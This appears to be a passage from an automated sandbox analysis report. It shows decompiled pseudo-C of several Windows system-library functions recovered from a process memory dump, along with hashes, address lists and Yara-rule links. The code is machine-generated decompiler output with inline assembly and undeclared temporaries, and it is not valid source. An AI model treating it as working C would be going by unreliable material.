Instruction ID: 54a4515c9dd8f80c1e3361f67f13eec8ee2fa6924466383384e5bf912ab8d478
Opcode Fuzzy Hash: f2f3882a6a6c60f25f27df2439f6d2b0dad7946cc2987b7efd4fd495ba2dda44
Instruction Fuzzy Hash: 1E31E7B1A06244DFEB61EF68D088BDEBBFDBB48314F188189C54567352D334B940DB91

Uniqueness

Uniqueness Score: -1.00%

Function 04AD0050, Relevance: .1, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E04AD0050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x4bad360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E04AE9ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E04AFB640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E04B88A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E04AE9702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x4bab1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}

0x04ad0055
0x04ad005d
0x04ad0062
0x04ad006c
0x04ad006f
0x04ad0074
0x04ad007a
0x04ad007a
0x04ad0080
0x04ad0080
0x04ad0087
0x04ad008d
0x04ad008f
0x04ad0093
0x04ad0095
0x04ad009b
0x04ad00f8
0x04ad00fb
0x04ad00fc
0x04ad00ff
0x04ad0108
0x04ad0108
0x04ad00a2
0x04ad00a6
0x04ad00b3
0x04ad00bc
0x04ad00c5
0x04ad00ca
0x04b1c01e
0x00000000
0x00000000
0x04b1c02d
0x04ad00d5
0x04ad00d9
0x04b1c03d
0x04b1c046
0x04b1c046
0x04ad00df
0x04ad00e2
0x04ad00ea
0x04ad00ef
0x04ad00f2
0x04ad00f6
0x04ad0111
0x04ad0117
0x04ad0117
0x00000000
0x04ad00f6
0x04ad00d0
0x04ad00d0
0x00000000

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e28552aefd1b9ee053679c95b5c23676c08131e965ecd521f1f5d726d23e2fb
Instruction ID: 00c5cdefc540f5ca79639ffdaf9f3c05b593f208097631db4de3a6a5ec6e5221
Opcode Fuzzy Hash: 0e28552aefd1b9ee053679c95b5c23676c08131e965ecd521f1f5d726d23e2fb
Instruction Fuzzy Hash: EE31AE31601B04DFE721CF28C944BAAB7F5FF88718F14456DE59687A90EB75B801CB60

Uniqueness

Uniqueness Score: -1.00%

Function 04B36C0A, Relevance: .1, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E04B36C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E04AD7D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x4ba7b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L04AD4620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E04AFF3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E04AD7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E04AF9AE0();
						_t23 = L04AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}

0x04b36c0a
0x04b36c0f
0x04b36c10
0x04b36c13
0x04b36c15
0x04b36c19
0x04b36c1c
0x04b36c21
0x04b36c28
0x04b36c3a
0x04b36c2a
0x04b36c33
0x04b36c33
0x04b36c3f
0x04b36c48
0x04b36c4d
0x04b36c60
0x04b36c65
0x04b36c69
0x04b36c73
0x04b36c79
0x04b36c7f
0x04b36c86
0x04b36c90
0x04b36c94
0x04b36ca6
0x04b36cb2
0x04b36cbd
0x04b36cbd
0x04b36cc3
0x04b36cc7
0x04b36ccb
0x04b36cd0
0x04b36cd1
0x04b36ce2
0x04b36ce2
0x04b36c69
0x04b36ced

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3dc7da156e181dc9513385692367192cd30e344c461ff0b19f4887d655f6d40c
Instruction ID: 30fd95512ad3e5f5399fe0fab29f92b273a0bffbbbe0944f92f484531704bc84
Opcode Fuzzy Hash: 3dc7da156e181dc9513385692367192cd30e344c461ff0b19f4887d655f6d40c
Instruction Fuzzy Hash: 7021ABB1A00644BFD725DB69D980F6AB7B8FF48704F1400AAF905C7790E638ED10CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 04AF90AF, Relevance: .1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E04AF90AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E04B0D4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E04AEE5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L04AD4620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E04AFF3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E04AEA2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}

0x04af90af
0x04af90b8
0x04af90bb
0x04af90bf
0x04af90c2
0x04af90c2
0x04af90c8
0x04af90cb
0x04af90cd
0x04b314d7
0x04b314eb
0x04b314eb
0x00000000
0x04b314eb
0x04b314db
0x04b314e6
0x00000000
0x04b314f2
0x04b314e8
0x00000000
0x04b314e8
0x04af90d8
0x04af90da
0x04af90dd
0x04af90e5
0x00000000
0x04af9139
0x04af90fa
0x04af90fe
0x04af9142
0x00000000
0x04af9142
0x04af9104
0x04af9107
0x04af910b
0x04af9110
0x04af9118
0x04af9147
0x04af9148
0x04af914f
0x04af9150
0x04af9151
0x04af9152
0x04af9156
0x04af915d
0x04af9160
0x04af9168
0x04af916c
0x04af91bc
0x04af91be
0x00000000
0x04af91be
0x04af916e
0x04af9173
0x04af9176
0x00000000
0x00000000
0x04af917c
0x04af9180
0x04af91b5
0x00000000
0x04af91b5
0x04af9182
0x04af9185
0x04af9189
0x00000000
0x00000000
0x04af918e
0x04af9190
0x04af9198
0x00000000
0x00000000
0x04af91a0
0x00000000
0x04af91ad
0x04af91ad
0x04af91b0
0x04af91b1
0x00000000
0x04af9185
0x04af911a
0x04af911c
0x04af911f
0x04af9125
0x04af9127
0x00000000

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction ID: 32258a1dfa1f313fb783b22b5aef7015431042708219792d97348944039ca32e
Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction Fuzzy Hash: 42214FB1A01204EFEB20DF99C944FAAF7FCEB44354F14887AFA55A7250D230B9448F90

Uniqueness

Uniqueness Score: -1.00%

Function 04AE3B7A, Relevance: .1, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E04AE3B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x4ba84c4; // 0x0
				_v12 = 1;
				_v8 =  *0x4ba84c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L04AD4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x4ba84c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E04AFAA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E04AFFA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x4ba84c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x4ba84c4; // 0x0
					L04AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}

0x04ae3b89
0x04ae3b96
0x04ae3ba1
0x04ae3bab
0x04ae3bb5
0x04ae3bb9
0x04b26298
0x04ae3bbf
0x04ae3bc2
0x04ae3bc3
0x04ae3bc9
0x04ae3bca
0x04ae3bcc
0x04ae3bcd
0x04ae3bd4
0x04ae3bd6
0x04ae3bdb
0x04ae3bea
0x04ae3bf7
0x04ae3bfb
0x04ae3bff
0x04ae3c09
0x04ae3c0a
0x04ae3c0b
0x04ae3c0f
0x04ae3c14
0x04ae3c18
0x04ae3c18
0x04ae3bfb
0x04ae3c1b
0x04ae3c30
0x04ae3c30
0x04ae3c3d

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e060e8fff4962db81f83a96a34a374ae14d7237276b25d31d9f65e30bc9b38aa
Instruction ID: 8d0c8a600d148199af05d9422f5e43a9ede3d8a5bf9b26f1d00b753199970529
Opcode Fuzzy Hash: e060e8fff4962db81f83a96a34a374ae14d7237276b25d31d9f65e30bc9b38aa
Instruction Fuzzy Hash: D02195B2A00104AFDB04DF59CE81B6AB7BDFF44708F150069EA099B251D775FD15CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04B36CF0, Relevance: .1, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E04B36CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E04AD7D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E04AD7D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x4a95c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E04AEF6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E04AEF6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E04B37016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L04AD2400( &_v52);
								}
								_t21 = L04AD2400( &_v28);
							}
						}
					}
				}
				return _t21;
			}

0x04b36cfb
0x04b36d00
0x04b36d02
0x04b36d06
0x04b36d0a
0x04b36d0e
0x04b36d19
0x04b36d2b
0x04b36d1b
0x04b36d24
0x04b36d24
0x04b36d33
0x04b36d39
0x04b36d46
0x04b36d4f
0x04b36d61
0x04b36d51
0x04b36d5a
0x04b36d5a
0x04b36d69
0x04b36d6b
0x04b36d6d
0x04b36d6f
0x04b36d6f
0x04b36d74
0x04b36d79
0x04b36d7a
0x04b36d7f
0x04b36d82
0x04b36d88
0x04b36d89
0x04b36d90
0x04b36d94
0x04b36da7
0x04b36db1
0x04b36db1
0x04b36dbb
0x04b36dbb
0x04b36d90
0x04b36d69
0x04b36d46
0x04b36dc6

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9cd6d4620a9fab1d8a4cd14e52f27059725e27661050fb672b847e23910203c1
Instruction ID: f0a820ceb5f5ea3707b308816caa919c1e4f55785db5057dfd72d9a72add0bb4
Opcode Fuzzy Hash: 9cd6d4620a9fab1d8a4cd14e52f27059725e27661050fb672b847e23910203c1
Instruction Fuzzy Hash: B421C272504244BFD721DF6ADA44BABB7ECEF81744F040596F980C7251EB34FA08D6A2

Uniqueness

Uniqueness Score: -1.00%

Function 04B8070D, Relevance: .1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E04B8070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E04B807DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E04B7AFDE( &_v8,  &_v12);
					E04B81293(_t38, _v28, _t60);
					if(E04AD7D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E04B714FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}

0x04b8071b
0x04b80724
0x04b80734
0x04b80738
0x04b8074b
0x04b8074b
0x04b80753
0x04b80753
0x04b80759
0x04b8075d
0x04b80774
0x04b80779
0x04b8077d
0x04b80789
0x04b80795
0x04b807a7
0x04b80797
0x04b807a0
0x04b807a0
0x04b807af
0x04b807c4
0x04b807cd
0x04b807cd
0x04b807af
0x04b807dc

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction ID: 4eed34cea58ff121ecb125fac8d74400fe68fe7ac5f72a1260c4301f9dc7936c
Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction Fuzzy Hash: 8121263A3042049FD715EF28C880B6ABBA5EFC4350F0485ADFD958B385D730E909CB91

Uniqueness

Uniqueness Score: -1.00%

Function 04ADAE73, Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E04ADAE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E04AD7D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E04AD7D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E04AD7D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E04AD7D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E04B37794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}

0x04adae78
0x04adae7c
0x04adae7e
0x04adae81
0x04adae86
0x04adae8d
0x04b22691
0x04adae93
0x04adae93
0x04adae93
0x04adae98
0x04adae9d
0x04b226a2
0x04b226b4
0x04b226a4
0x04b226ad
0x04b226ad
0x04b226b9
0x00000000
0x04b226bb
0x00000000
0x04b226bb
0x04adaea3
0x04adaea3
0x04adaea3
0x04adaeaa
0x04b226c0
0x04b226c9
0x04b226c9
0x04adaeb3
0x04b226d4
0x04b226e1
0x00000000
0x00000000
0x04b226e7
0x04b226ee
0x04b226f0
0x04b226f9
0x04b226f9
0x04b22702
0x04b22708
0x04b22708
0x04b2270b
0x04b2270f
0x04b22711
0x04b22711
0x04b22725
0x04b22725
0x00000000
0x04adaeb9
0x04adaeb9
0x04adaebf
0x04adaebf
0x04adaeb3

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction ID: bf160b9fcae44fddc59abe071bab02fc5577e3779898b1e4a5995588b31baae6
Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction Fuzzy Hash: 6621F672601691DFEB1A9F69CA48B2577E8EF45344F0900E1DD0ACB7A2EB34FD40C690

Uniqueness

Uniqueness Score: -1.00%

Function 04B37794, Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E04B37794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x4ba7b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L04AD4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E04AFF3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E04AD7D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E04AF9AE0();
					_t24 = L04AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}

0x04b37799
0x04b3779a
0x04b3779b
0x04b377a3
0x04b377ab
0x04b377ae
0x04b377b1
0x04b377b1
0x04b377bf
0x04b377c4
0x04b377c8
0x04b377ce
0x04b377d4
0x04b377e0
0x04b377e0
0x04b377d6
0x04b377d6
0x04b377de
0x00000000
0x00000000
0x04b377de
0x04b377e5
0x04b377f0
0x04b377f3
0x04b377f6
0x04b377fd
0x04b37800
0x04b3780c
0x04b37818
0x04b3782b
0x04b3781a
0x04b37823
0x04b37823
0x04b37830
0x04b37831
0x04b37838
0x04b3783d
0x04b3783e
0x04b3784f
0x04b3784f
0x04b3785a

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e6b600e8039525f0464e19b290aa3e3934d2420789b67c8a9151dbc00f1d751
Instruction ID: d898e7597fdfc47025df03f974f79a374d40ddbbe0a69ba3d5728119b6d8dc8a
Opcode Fuzzy Hash: 3e6b600e8039525f0464e19b290aa3e3934d2420789b67c8a9151dbc00f1d751
Instruction Fuzzy Hash: 2B2181B2900604AFD725DF6ADD90E6BB7A9EF48740F10456DF50AD7750EA34E900CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 04AEFD9B, Relevance: .1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E04AEFD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L04AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E04AC76E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L04AD4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}

0x04aefd9b
0x04aefda0
0x04aefda1
0x04aefdab
